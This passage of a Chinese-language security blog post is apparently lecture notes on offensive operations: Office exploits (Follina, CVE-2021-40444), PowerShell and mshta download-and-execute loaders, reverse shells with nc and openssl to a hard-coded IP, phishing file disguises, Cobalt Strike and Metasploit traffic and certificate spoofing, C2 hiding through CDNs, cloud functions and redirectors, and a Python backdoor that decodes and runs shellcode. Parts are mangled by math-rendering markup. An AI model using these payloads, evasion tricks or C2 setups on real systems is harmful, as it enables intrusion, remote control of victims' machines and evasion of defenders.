(’‘<span class="exturl" data-url="aHR0cDovLzQ3Ljk0LjIzNi4xMTc6ODQvYQ==">http://47.94.236.117:84/a</span>’’)’.Replace(‘123’,‘adString’);IEX (<span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>c</mi><mn>1</mn><mo>+</mo></mrow><annotation encoding="application/x-tex">c1+</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.72777em;vertical-align:-0.08333em;"></span><span class="mord mathnormal">c</span><span class="mord">1</span><span class="mord">+</span></span></span></span>c2)”<br>
copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe bypass.<br>
exe &amp;&amp; .\bypass.exe “<span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>a</mi><msup><mo>=</mo><mo mathvariant="normal" lspace="0em" rspace="0em">′</mo></msup><mi>I</mi><mi>E</mi><mi>X</mi><mo stretchy="false">(</mo><mo stretchy="false">(</mo><mi>N</mi><mi>e</mi><mi>w</mi><mo>−</mo><mi>O</mi><mi>b</mi><mi>j</mi><mi>e</mi><mi>c</mi><mi>t</mi><mi>N</mi><mi>e</mi><mi>t</mi><mi mathvariant="normal">.</mi><mi>W</mi><mi>e</mi><mi>b</mi><mi>C</mi><mi>l</mi><mi>i</mi><mi>e</mi><mi>n</mi><mi>t</mi><mo stretchy="false">)</mo><mi mathvariant="normal">.</mi><mi>D</mi><mi>o</mi><mi>w</mi><mi>n</mi><mi>l</mi><mi>o</mi><mi>a</mi><mi>d</mi><mi>S</mi><mi>t</mi><mi>r</mi><mi>i</mi><mi>n</mi><mi>g</mi><msup><mo stretchy="false">(</mo><mrow><mo mathvariant="normal">′</mo><mo mathvariant="normal">′</mo></mrow></msup><mi>h</mi><msup><mi>t</mi><mo mathvariant="normal" lspace="0em" rspace="0em">′</mo></msup><mo separator="true">;</mo></mrow><annotation encoding="application/x-tex">a=&#x27;IEX((New-Object Net.WebClient).DownloadString(&#x27;&#x27;ht&#x27;;
</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.751892em;vertical-align:0em;"></span><span class="mord mathnormal">a</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel"><span class="mrel">=</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.751892em;"><span style="top:-3.063em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">′</span></span></span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2777777777777778em;"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mord mathnormal" style="margin-right:0.07847em;">I</span><span class="mord mathnormal" style="margin-right:0.05764em;">E</span><span class="mord mathnormal" style="margin-right:0.07847em;">X</span><span class="mopen">(</span><span class="mopen">(</span><span class="mord mathnormal" style="margin-right:0.10903em;">N</span><span class="mord mathnormal">e</span><span class="mord mathnormal" style="margin-right:0.02691em;">w</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span><span class="mbin">−</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span></span><span class="base"><span class="strut" style="height:1.001892em;vertical-align:-0.25em;"></span><span class="mord mathnormal" style="margin-right:0.02778em;">O</span><span class="mord mathnormal">b</span><span class="mord mathnormal" style="margin-right:0.05724em;">j</span><span class="mord mathnormal">e</span><span class="mord mathnormal">c</span><span class="mord mathnormal">t</span><span class="mord mathnormal" style="margin-right:0.10903em;">N</span><span class="mord mathnormal">e</span><span class="mord mathnormal">t</span><span class="mord">.</span><span class="mord mathnormal" style="margin-right:0.13889em;">W</span><span class="mord mathnormal">e</span><span class="mord mathnormal">b</span><span class="mord mathnormal" style="margin-right:0.07153em;">C</span><span class="mord mathnormal" style="margin-right:0.01968em;">l</span><span class="mord mathnormal">i</span><span class="mord mathnormal">e</span><span class="mord mathnormal">n</span><span class="mord mathnormal">t</span><span class="mclose">)</span><span class="mord">.</span><span class="mord mathnormal" style="margin-right:0.02778em;">D</span><span class="mord mathnormal">o</span><span class="mord mathnormal" style="margin-right:0.02691em;">w</span><span class="mord mathnormal">n</span><span class="mord mathnormal" style="margin-right:0.01968em;">l</span><span class="mord mathnormal">o</span><span class="mord mathnormal">a</span><span class="mord mathnormal">d</span><span class="mord mathnormal" style="margin-right:0.05764em;">S</span><span class="mord mathnormal">t</span><span class="mord mathnormal" style="margin-right:0.02778em;">r</span><span class="mord mathnormal">i</span><span class="mord mathnormal">n</span><span class="mord mathnormal" style="margin-right:0.03588em;">g</span><span class="mopen"><span class="mopen">(</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.751892em;"><span style="top:-3.063em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">′</span><span class="mord mtight">′</span></span></span></span></span></span></span></span></span><span class="mord mathnormal">h</span><span class="mord"><span class="mord mathnormal">t</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.751892em;"><span style="top:-3.063em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">′</span></span></span></span></span></span></span></span></span><span class="mpunct">;</span></span></span></span>b=‘tp://xxx/hr.ps1’’));’;IEX (<span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>a</mi><mo>+</mo></mrow><annotation encoding="application/x-tex">a+</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.66666em;vertical-align:-0.08333em;"></span><span class="mord mathnormal">a</span><span class="mord">+</span></span></span></span>b)”</p>
<p><strong>0 x0 3 LNK</strong> 快捷方式</p>
<p>生成：Attacks -&gt; Packages -&gt; Html Application<br>
 上传：Attacks——&gt;Web Drive by——&gt;Host file<br>
 执行：C:\Windows\System32\mshta.exe <span class="exturl" data-url="aHR0cDovL3h4Lnh4Lnh4Lnh4Onh4L3guZXh0">http://xx.xx.xx.xx:xx/x.ext</span><br>
 伪装：创建快捷方式、生成 HTA 并上传、属性更改目标执行、属性更改图<br>
标伪装<br>
 lnk 免杀思路：powershell 混淆、shellcode 混淆、vba 混淆</p>
<h3 id="1323-office-cve漏洞"><a class="markdownIt-Anchor" href="#1323-office-cve漏洞">#</a> 13.2.3 office CVE 漏洞</h3>
<p>（ 1 ）Microsoft MSDT CVE- 2022 - 30190 代码执行<br>
工具地址：<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL0pvaG5IYW1tb25kL21zZHQtZm9sbGluYQ==">https://github.com/JohnHammond/msdt-follina</span><br>
 该漏洞首次发现在 2022 年 5 月 27 日，由白俄罗斯的一个 IP 地址上传。恶<br>
意文档从 Word 远程模板功能从远程 Web 服务器检索 HTML 文件，通过 ms-ms<br>
dt MSProtocol URI 方法来执行恶意 PowerShell 代码。感染过程利用程序 msdt.e<br>
xe，该程序用于运行各种疑难解答程序包。<br>
此工具的恶意文档无需用户交互即可调用它。导致在宏被禁用的情况下，<br>
恶意文档依旧可以使用 ms-msdt URI 执行任意 PowerShell 代码。<br>
目前已知影响的版本为：office 2021 Lts、office 2019、office 2016、Offic<br>
e 2013、Office ProPlus、Office 365</p>
<p>测试：msdt.exe/id PCWDiagnostic /skip force /param “IT_RebrowseForFile=? I<br>
T_LaunchMethod=ContextMenu IT_BrowseForFile=<span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mo stretchy="false">(</mo><mi>I</mi><mi>n</mi><mi>v</mi><mi>o</mi><mi>k</mi><mi>e</mi><mo>−</mo><mi>E</mi><mi>x</mi><mi>p</mi><mi>r</mi><mi>e</mi><mi>s</mi><mi>s</mi><mi>i</mi><mi>o</mi><mi>n</mi><mo stretchy="false">(</mo></mrow><annotation encoding="application/x-tex">(Invoke-Expression(</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mopen">(</span><span class="mord mathnormal" style="margin-right:0.07847em;">I</span><span class="mord mathnormal">n</span><span class="mord mathnormal" style="margin-right:0.03588em;">v</span><span class="mord mathnormal">o</span><span class="mord mathnormal" style="margin-right:0.03148em;">k</span><span class="mord mathnormal">e</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span><span class="mbin">−</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mord mathnormal" style="margin-right:0.05764em;">E</span><span class="mord mathnormal">x</span><span class="mord mathnormal">p</span><span class="mord mathnormal" style="margin-right:0.02778em;">r</span><span class="mord mathnormal">e</span><span class="mord mathnormal">s</span><span class="mord mathnormal">s</span><span class="mord mathnormal">i</span><span class="mord mathnormal">o</span><span class="mord mathnormal">n</span><span class="mopen">(</span></span></span></span>(Invoke-<br>
Expression(’[System.Text.Encoding]’+[char]58+[char]58+‘Unicode.GetString([Syste<br>
m.Convert]’+[char]58+[char]58+‘FromBase64String(’+[char]34+‘YwBhAGwAYwA=’<br>
+[char]34+’))’))))i/…/…/…/…/…/…/…/…/…/…/…/…/…/…/Windows/System32/mpsigstub.exe”</p>
<p>（ 2 ）Microsoft MSHTML CVE- 2021 - 40444 远程代码执行<br>
工具地址：<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2xvY2tlZGJ5dGUvQ1ZFLQ==">https://github.com/lockedbyte/CVE-</span> 2021 - 40444<br>
 影响版本：office 2003 office 2007 office 2010 office 2013 office 2016<br>
 安装依赖：apt-get install lcab<br>
 生成 DLL：msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117<br>
lport=9999 -f dll &gt; shell.dll<br>
 监听上线：<br>
use exploit/multi/handler<br>
set payload windows/meterpreter/reverse_tcp<br>
set lhost 0.0.0.0<br>
set lport 9999<br>
run<br>
 生成文档：cp shell.dll CVE- 2021 - 40444<br>
python3 <span class="exturl" data-url="aHR0cDovL2V4cGxvaXQucHk=">exploit.py</span> generate shell.dll <span class="exturl" data-url="aHR0cDovLzQ3Ljk0LjIzNi4xMTc6MTAwMDA=">http://47.94.236.117:10000</span><br>
 监听文档：python3 <span class="exturl" data-url="aHR0cDovL2V4cGxvaXQucHk=">exploit.py</span> host 10000</p>
<h3 id="1334-钓鱼伪装"><a class="markdownIt-Anchor" href="#1334-钓鱼伪装">#</a> 13.3.4 钓鱼伪装</h3>
<h5 id="1-文件后缀-钓鱼伪装-rlo"><a class="markdownIt-Anchor" href="#1-文件后缀-钓鱼伪装-rlo">#</a> （ 1 ）文件后缀 - 钓鱼伪装 - RLO</h5>
<p>通过修改文件后缀的编码方式，将 exe 后缀文件伪装为 jpg 文件<br>
（ 2 ）压缩文件 - 自解压 - 释放执行<br>
 Winrar 压缩软件，设置压缩为自启动，双击压缩文件之后即释放木马<br>
（ 3 ）捆绑文件 - 打包加载 - 释放执行<br>
通过不同的捆绑释放器进行绑定免杀木马，执行文件后释放木马</p>
<h3 id="1-335-msfcs特征修改"><a class="markdownIt-Anchor" href="#1-335-msfcs特征修改">#</a> 1 3.3.5 msf/cs 特征修改</h3>
<h5 id="1-nc-未加密加密后-流量抓包对比"><a class="markdownIt-Anchor" href="#1-nc-未加密加密后-流量抓包对比">#</a> （ 1 ）NC - 未加密 &amp; 加密后 - 流量抓包对比</h5>
<p>nc -lvvp 5566<br>
nc -e /bin/bash 47.94.236.117 5566<br>
 在我们的攻击端生成自签名证书：openssl req -x509 -newkey rsa:2048 -ke<br>
yout key.pem -out cert.pem -days 365 -nodes<br>
 在攻击机上监听指定端口，这里我选择 8888 ：<br>
openssl s_server -quiet -key key.pem -cert cert.pem -port 8888<br>
 在受害机上执行 shell 反弹命令 (注意修改 ip 和端口)：<br>
mkfifo /tmp/s; /bin/sh -i &lt; /tmp/s 2&gt;&amp;1 | openssl s_client -quiet -connect<br>
47.94.236.117:8888 &gt; /tmp/s;</p>
<p>（ 2 ）MSF - 流量通讯特征修改 - 证书 - openssl<br>
 解决 HTTPS-SSL 通讯证书被特征标示问题<br>
利用 openssl 生成证书：<br>
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj “/C=UK/<br>
ST=xiaodi/L=xiaodi/O=Development/CN=<span class="exturl" data-url="aHR0cDovL3d3dy5iYWlkdS5jb20=">www.baidu.com</span>” -keyout <span class="exturl" data-url="aHR0cDovL3d3dy5iYWlkdS5jbw==">http://www.baidu.co</span><br>
m.key -out <span class="exturl" data-url="aHR0cDovL3d3dy5iYWlkdS5jb20uY3J0">http://www.baidu.com.crt</span> &amp;&amp; cat <span class="exturl" data-url="aHR0cDovL3d3dy5iYWlkdS5jb20ua2V5">http://www.baidu.com.key</span> <span class="exturl" data-url="aHR0cDovL3d3dy5iYWlkdS5jb20uY3J0">http://www.baidu.com.crt</span> &gt;<br>
<span class="exturl" data-url="aHR0cDovL3d3dy5iYWlkdS5jb20ucGVt">http://www.baidu.com.pem</span> &amp;&amp; rm -f <span class="exturl" data-url="aHR0cDovL3d3dy5iYWlkdS5jb20ua2V5">http://www.baidu.com.key</span> <span class="exturl" data-url="aHR0cDovL3d3dy5iYWlkdS5jb20uY3J0">http://www.baidu.com.crt</span><br>
MSF 生成绑定证书后门：<br>
msfvenom -p windows/meterpreter/reverse_https LHOST=47.94.236.117 LPO<br>
RT=5566 PayloadUUIDTracking=true PayloadUUIDName=Whoamishell HandlerS<br>
SLCert=/root/www.baidu.com.pem StagerVerifySSLCert=true -f exe -o https-b.exe<br>
MSF 监听上线：</p>
<p>use exploit/multi/handler<br>
set payload windows/meterpreter/reverse_https<br>
set lhost 0.0.0.0<br>
set lport 5566<br>
set HandlerSSLCert /root/www.baidu.com.pem<br>
set StagerVerifySSLCert true<br>
run<br>
impersonate_ssl 模块：<br>
此外 Metasploit 框架还有一个 auxiliary/gather/impersonate_ssl 模块，可以用<br>
来自动从信任源创建一个虚假证书，十分方便：<br>
use auxiliary/gather/impersonate_ssl<br>
set RHOST <span class="exturl" data-url="aHR0cDovL3d3dy5iYWlkdS5jb20=">http://www.baidu.com</span><br>
run</p>
<p>（ 3 ）#CS - 流量通讯特征修改 - 证书指纹 - keytool<br>
 解决 HTTP/S 通讯证书及流量特征被特征标示问题、JDK Keytool 修改 CS<br>
 特征。修改默认端口：编辑 teamserver 文件，更改 server port 部分 50000 。<br>
a. 去除 store 证书特征：<br>
查看证书指纹：keytool -list -v -keystore cobaltstrike.store<br>
 生成证书指纹：keytool -keystore cobaltstrike1.store -storepass 123456 -key<br>
pass 123456 -genkey -keyalg RSA -alias <span class="exturl" data-url="aHR0cDovL3hpYW9kaTguY29t">xiaodi8.com</span> -dname “CN=xiaodi8 e-Sz<br>
igno Root CA, OU=e-Szigno CA, O=xiaodi8 Ltd., L=Budapest, S=HU, C=HU”<br>
 应用证书指纹：keytool -importkeystore -srckeystore cobaltstrike1.store -dest<br>
keystore cobaltstrike1.store -deststoretype pkcs12<br>
b. 去除流量通讯特征：<br>
规则资源：<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL3h4MGhjZC9NYWxsZWFibGUtQzItUHJvZmlsZXMlRTQlQjglOEVodHRwczovL2dpdGh1Yi5j">https://github.com/xx0hcd/Malleable-C2-Profiles 与 https://github.c</span><br>
om/FortyNorthSecurity/C2concealer<br>
 创建 C2 文件：xiaodi.Profiles<br>
 写入通讯规则: UA 头 &amp; GET&amp;POST &amp; 心跳 &amp; 证书等<br>
测试规则正常：./c2lint xiaodi.prifile<br>
c. 加载 C2 规则启动：./teamserver ip 密码 xiaodi.Profiles<br>
https-certificate {<br>
set CN “xiaodi8”;<br>
set O “Microsoft”;</p>
<p>set C “en”;<br>
set L “US”;<br>
set OU “Microsoft”;<br>
set ST “US”;<br>
set validity “365”;<br>
}<br>
 d. 设置，修改成你的证书名称和证书密码<br>
 code-signer {<br>
set keystore “xiaodi.store”;<br>
set password “xiaodi”;<br>
set alias “<span class="exturl" data-url="aHR0cDovL3hpYW9kaTguY29t">xiaodi8.com</span>”;<br>
}</p>
<h3 id="1336-c2服务器隐藏"><a class="markdownIt-Anchor" href="#1336-c2服务器隐藏">#</a> 13.3.6 c2 服务器隐藏</h3>
<h5 id="防封锁处置ip地址域前置-cdn-云函数网盘第三方上线等"><a class="markdownIt-Anchor" href="#防封锁处置ip地址域前置-cdn-云函数网盘第三方上线等">#</a> 防封锁处置 IP 地址：域前置、CDN、云函数，网盘第三方上线等</h5>
<p>（ 1 ）cs 采用 CDN 上线<br>
解决 HTTPS-SSL 通讯被朔源 IP 封锁问题<br>
配置：<span class="exturl" data-url="aHR0cHM6Ly9tcC53ZWl4aW4ucXEuY29tL3MvTWdoRmdlZ2RwM2wzdEZFM2hPdmNZdw==">https://mp.weixin.qq.com/s/MghFgegdp3l3tFE3hOvcYw</span><br>
 阿里云备案域名 &amp; 全站加速 CDN 配置、CS 创建监听器 - HTTPS/Stager/Head<br>
er、生成后门 - 进程网络状态 &amp; 威胁情报平台。<br>
（ 2 ）域前置 - CDN 配合<br>
此方案在大部分 IDC 不再支持<br>
（ 3 ）DNS 协议 - 域名记录解析<br>
 a. 域名解析设置 A,NS 记录<br>
 ns1 ns <span class="exturl" data-url="aHR0cDovL2NzLnh4eC5jb20=">cs.xxx.com</span><br>
ns2 ns <span class="exturl" data-url="aHR0cDovL2NzLnh4eC5jb20=">cs.xxx.com</span><br>
cs A xx.xx.xx.xx (CS 的 IP)<br>
 b. CS 监听器 - DNS<br>
Beacon DNS<br>
DNS 地址配置：<span class="exturl" data-url="aHR0cDovL25zMS54eHguY29t">ns1.xxx.com</span> <span class="exturl" data-url="aHR0cDovL25zMi54eHguY29t">ns2.xxx.com</span><br>
c. 执行后 checkin 唤醒</p>
<h5 id="4-云函数-腾讯云操作"><a class="markdownIt-Anchor" href="#4-云函数-腾讯云操作">#</a> （ 4 ）云函数 - 腾讯云操作</h5>
<h5 id="创建云函数腾讯云-云产品-云函数-函数服务-新建"><a class="markdownIt-Anchor" href="#创建云函数腾讯云-云产品-云函数-函数服务-新建">#</a> 创建云函数：腾讯云 - 云产品 - 云函数 - 函数服务 - 新建</h5>
<h5 id="创建函数服务选择从头开始-函数类型选择事件函数-函数名称任意-运行"><a class="markdownIt-Anchor" href="#创建函数服务选择从头开始-函数类型选择事件函数-函数名称任意-运行">#</a> 创建函数服务：选择从头开始 - 函数类型选择事件函数 - 函数名称任意 - 运行</h5>
<p>环境选择 python3.6 - 并复制如下代码并修改 CS 的 IP - 点击完成</p>
<h1 id="-coding-utf8-"><a class="markdownIt-Anchor" href="#-coding-utf8-">#</a> -<em>- coding: utf8 -</em>-</h1>
<p>import json,requests,base64<br>
def main_handler(event, context):<br>
C2=‘<span class="exturl" data-url="aHR0cHM6Ly9YWFhY">https://XXXX</span>’ # 修改为自己 C2 服务器地址<br>
 path=event [‘path’]<br>
headers=event[‘headers’]<br>
print(event)<br>
if event[‘httpMethod’] == ‘GET’ :<br>
resp=requests.get(C2+path,headers=headers,verify=False)<br>
else:<br>
resp=requests.post(C2+path,data=event[‘body’],headers=headers,verify=False)<br>
print(resp.headers)<br>
print(resp.content)<br>
response={<br>
“isBase64Encoded”: True,<br>
“statusCode”: resp.status_code,<br>
“headers”: dict(resp.headers),<br>
“body”: str(base64.b64encode(resp.content))[2:-1]<br>
}<br>
return response<br>
 创建触发器：触发方式选择 API 网关触发 - 勾选启用集成响应 - 点击提交<br>
配置触发器：点击 API 服务名对触发器进行配置，将路径修改为 /，然后点<br>
击立即完成<br>
配置 profile 文件 - 触发 URL：<br>
set sample_name “t”;<br>
set sleeptime “3000”;<br>
set jitter “0”;<br>
set maxdns “255”;<br>
set useragent “Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)”;<br>
http-get {<br>
set uri “/api/x”;<br>
client {</p>
<p>header “Accept” “<em>/</em>”;<br>
metadata {<br>
base64;<br>
prepend “SESSIONID=”;<br>
header “Cookie”;<br>
}<br>
}<br>
server {<br>
header “Content-Type” “application/ocsp-response”;<br>
header “content-transfer-encoding” “binary”;<br>
header “Server” “Nodejs”;<br>
output {<br>
base64;<br>
print;<br>
}<br>
}<br>
}<br>
http-stager {<br>
set uri_x86 “/vue.min.js”;<br>
set uri_x64 “/bootstrap-2.min.js”;<br>
}<br>
http-post {<br>
set uri “/api/y”;<br>
client {<br>
header “Accept” “<em>/</em>”;<br>
id {<br>
base64;<br>
prepend “JSESSION=”;<br>
header “Cookie”;<br>
}<br>
output {<br>
base64;<br>
print;<br>
}</p>
<h5 id><a class="markdownIt-Anchor" href="#">#</a> }</h5>
<p>server {<br>
header “Content-Type” “application/ocsp-response”;<br>
header “content-transfer-encoding” “binary”;<br>
header “Connection” “keep-alive”;<br>
output {<br>
base64;<br>
print;<br>
}<br>
}<br>
}<br>
 启动 CS 加载 profile：./teamserver IP 密码 xxx.profile</p>
<p>（ 5 ）端口转发 - Iptables<br>
 转发机设置转发：(80 改 443 即 https)<br>
iptables -I INPUT -p tcp -m tcp --dport 80 -j ACCEPT<br>
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destinatio<br>
n 47.94.236.117:80<br>
iptables -t nat -A POSTROUTING -j MASQUERADE<br>
iptables -I FORWARD -j ACCEPT<br>
iptables -P FORWARD ACCEPT<br>
sysctl net.ipv4.ip_forward=1<br>
CS 监听器配置转发机 IP</p>
<p>（ 6 ）中间件反向代理 - Apache<br>
 代理机安装 Apache：<br>
apt-get install apache2<br>
a2enmod proxy proxy_ajp proxy_balancer proxy_connect proxy_http<br>
systemctl restart apache2<br>
/etc/apache2/sites-enabled/000-default.conf<br>
 中间件设置转发：<br>
<span class="exturl" data-url="aHR0cDo=">http:</span><br>
ProxyPass “/” “<span class="exturl" data-url="aHR0cDovL3huLS1DU0lQLWNsN2ov">http://CS 的 IP/</span>”<br>
ProxyPassReverse “/” “<span class="exturl" data-url="aHR0cDovL3huLS1DU0lQLWNsN2ov">http://CS 的 IP/</span>”</p>
<p>https:<br>
ProxyPass “/” “<span class="exturl" data-url="aHR0cHM6Ly94bi0tQ1NJUC1jbDdqLw==">https://CS 的 IP/</span>”<br>
ProxyPassReverse “/” “<span class="exturl" data-url="aHR0cHM6Ly94bi0tQ1NJUC1jbDdqLw==">https://CS 的 IP/</span>”<br>
 重启 Apache 服务：service apache2 restart<br>
CS 监听器配置转发机 IP</p>
<h2 id="133-python自动化"><a class="markdownIt-Anchor" href="#133-python自动化">#</a> 13.3 python 自动化</h2>
<h3 id="1331-socket免杀后门"><a class="markdownIt-Anchor" href="#1331-socket免杀后门">#</a> 13.3.1 socket 免杀后门</h3>
<p><strong>0 x0 1 <span class="exturl" data-url="aHR0cDovL2NsaWVudC5weQ==">client.py</span></strong></p>
<p>import socket,sys<br>
ip=sys.argv[1]<br>
port=sys.argv[2]<br>
s1=socket.socket()<br>
s1.connect((ip,int(port)))<br>
while True:<br>
cmdline=input(‘please input cmdline:’)<br>
s1.send(cmdline.encode())<br>
cmddata=s1.recv(1024).decode()<br>
print(cmddata)<br>
s1.close()</p>
<p><strong>0 x0 2 <span class="exturl" data-url="aHR0cDovL3NlcnZlci5weQ==">server.py</span></strong></p>
<p>import socket,os,ctypes,base64<br>
s=socket.socket()<br>
s.bind((‘0.0.0.0’,9999))<br>
s.listen(5)<br>
def zx(s):<br>
sc = base64.b64decode(s)<br>
code='cnd4cGFnZSA9IGN0eXBlcy53aW5kbGwua2VybmVsMzIuVmlydHVhbEFsb<br>
G9jKDAsIGxlbihzYyksIDB4MTAwMCwgMHg0MCkKY3R5cGVzLndpbmRsbC5r<br>
ZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KHJ3eHBhZ2UsIGN0eXBlcy5jcmVhdGVfc3<br>
RyaW5nX2J1ZmZlcihzYyksIGxlbihzYykpCmhhbmRsZSA9IGN0eXBlcy53aW5kbG</p>
<p>wua2VybmVsMzIuQ3JlYXRlVGhyZWFkKDAsIDAsIHJ3eHBhZ2UsIDAsIDAsIDA<br>
pCmN0eXBlcy53aW5kbGwua2VybmVsMzIuV2FpdEZvclNpbmdsZU9iamVjdChoY<br>
W5kbGUsIC0xKQ==’<br>
c=base64.b64decode(code)<br>
eval©<br>
while 1:<br>
sock,addr=s.accept()<br>
print(sock, addr)<br>
while 1:<br>
cmd=sock.recv(10241).decode()<br>
print(cmd)<br>
print(type(cmd))<br>
zx(cmd)<br>
print(cmd_data)<br>
print(type(cmd_data))<br>
sock.send(cmd_data.encode())<br>
sock.close()</p>
<h3 id="1332多线程全端口扫描"><a class="markdownIt-Anchor" href="#1332多线程全端口扫描">#</a> 13.3.2 多线程全端口扫描</h3>
<p>import socket<br>
import threading<br>
import queue<br>
def port_scan():<br>
while not q.empty():<br>
ip = ‘127.0.0.1’<br>
port = q.get()<br>
s = socket.socket()<br>
if s.connect_ex((ip, port)) == 0:<br>
print(&quot;%d is open&quot; %port)<br>
else:<br>
pass<br>
s.close()<br>
if <strong>name</strong> == ‘<strong>main</strong>’:<br>
q = queue.Queue()</p>
<p>for port in range(1,65536):<br>
q.put(port)<br>
for i in range(30):<br>
t = threading.Thread(target=port_scan)<br>
t.start()</p>
<h3 id="1333-scapy流量分析"><a class="markdownIt-Anchor" href="#1333-scapy流量分析">#</a> 13.3.3 scapy 流量分析</h3>
<p>from scapy.all import *<br>
def packet_callback(packet):<br>
#print(packet.show())<br>
data=bytes(packet[TCP].payload)<br>
for info in data.split(b’\n’):<br>
#print(info)<br>
if b’Content-Disposition: form-data; name=&quot;’ in info:<br>
print (‘文件上传攻击中…’)<br>
pass<br>
if <strong>name</strong> == ‘<strong>main</strong>’:<br>
sniff (filter=‘host 192.168.1.107 and tcp port 80’,iface=‘以太网’,prn=packet_cal<br>
lback,store=0)</p>
<h3 id="1334-文件行为监控"><a class="markdownIt-Anchor" href="#1334-文件行为监控">#</a> 13.3.4 文件行为监控</h3>
<p>from watchdog.observers import Observer<br>
from watchdog.events import *<br>
import time<br>
class FileEventHandler(FileSystemEventHandler):<br>
def <strong>init</strong>(self):<br>
FileSystemEventHandler.<strong>init</strong>(self)<br>
def on_moved(self, event):<br>
if event.is_directory:<br>
print(“directory moved from {0} to {1}”.format(event.src_path,<br>
event.dest_path))<br>
else:<br>
print(“file moved from {0} to {1}”.format(event.src_path,</p>
<p>event.dest_path))<br>
def on_created(self, event):<br>
if event.is_directory:<br>
print(“directory created:{0}”.format(event.src_path))<br>
else:<br>
print(“file created:{0}”.format(event.src_path))<br>
def on_deleted(self, event):<br>
if event.is_directory:<br>
print(“directory deleted:{0}”.format(event.src_path))<br>
else:<br>
print(“file deleted:{0}”.format(event.src_path))<br>
def on_modified(self, event):<br>
if event.is_directory:<br>
print(“directory modified:{0}”.format(event.src_path))<br>
else:<br>
print(“file modified:{0}”.format(event.src_path))<br>
if <strong>name</strong> == “<strong>main</strong>”:<br>
observer = Observer()<br>
event_handler = FileEventHandler()<br>
observer.schedule(event_handler, r&quot;C:\Users\wyq\Desktop\1&quot;, True)<br>
observer.start()<br>
try:<br>
while True:<br>
time.sleep(1)<br>
except KeyboardInterrupt:<br>
observer.stop()<br>
observer.join()</p>
<h2 id="134-应急响应"><a class="markdownIt-Anchor" href="#134-应急响应">#</a> 13.4 应急响应</h2>
<h3 id="未完待续_"><a class="markdownIt-Anchor" href="#未完待续_">#</a> 未完待续<sup>_</sup></h3>

  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2023-07-04 01:54:12" itemprop="dateModified" datetime="2023-07-04T01:54:12+08:00">2023-07-04</time>
  </span>
  <span id="2023/07/04/SAFE/13 补充知识/" class="item leancloud_visitors" data-flag-title="" title="阅读次数">
      <span class="icon">
        <i class="ic i-eye"></i>
      </span>
      <span class="text">阅读次数</span>
      <span class="leancloud-visitors-count"></span>
      <span class="text">次</span>
  </span>
</div>

      
<div class="reward">
  <button><i class="ic i-heartbeat"></i> 赞赏</button>
  <p>请我喝[茶]~(￣▽￣)~*</p>
  <div id="qr">
      
      <div>
        <img data-src="/images/wechatpay.png" alt=".N1h1l157 微信支付">
        <p>微信支付</p>
      </div>
      
      <div>
        <img data-src="/images/alipay.png" alt=".N1h1l157 支付宝">
        <p>支付宝</p>
      </div>
      
      <div>
        <img data-src="/images/paypal.png" alt=".N1h1l157 贝宝">
        <p>贝宝</p>
      </div>
  </div>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>.N1h1l157 <i class="ic i-at"><em>@</em></i>X_T
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="http://n1h1l157.github.io/2023/07/04/SAFE/13%20%E8%A1%A5%E5%85%85%E7%9F%A5%E8%AF%86/" title="">http://n1h1l157.github.io/2023/07/04/SAFE/13 补充知识/</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

